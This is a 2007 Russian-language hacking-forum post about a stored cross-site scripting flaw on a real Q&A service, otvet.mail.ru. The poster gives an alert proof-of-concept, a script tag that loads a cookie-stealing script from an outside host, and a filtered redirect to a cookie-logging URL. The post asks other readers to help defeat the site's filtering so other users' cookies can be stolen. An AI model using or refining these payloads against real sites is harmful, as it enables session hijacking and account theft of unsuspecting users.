11.01.2007, 11:42
|
|
Познающий
Регистрация: 10.01.2007
Сообщений: 35
Провел на форуме:
62785
Репутация:
34
|
|
Активная XSS на otvet.mail.ru!!!
Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш
Код:
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ
Код:
<scriptsrc="http://www.naxodka.net/cookie.js"></script>
. Всё равно фильтрует гад, вот результат фильтрации
Код:
<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>
. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!! 
Последний раз редактировалось DesignerMix; 11.01.2007 в 12:18..
|
|
|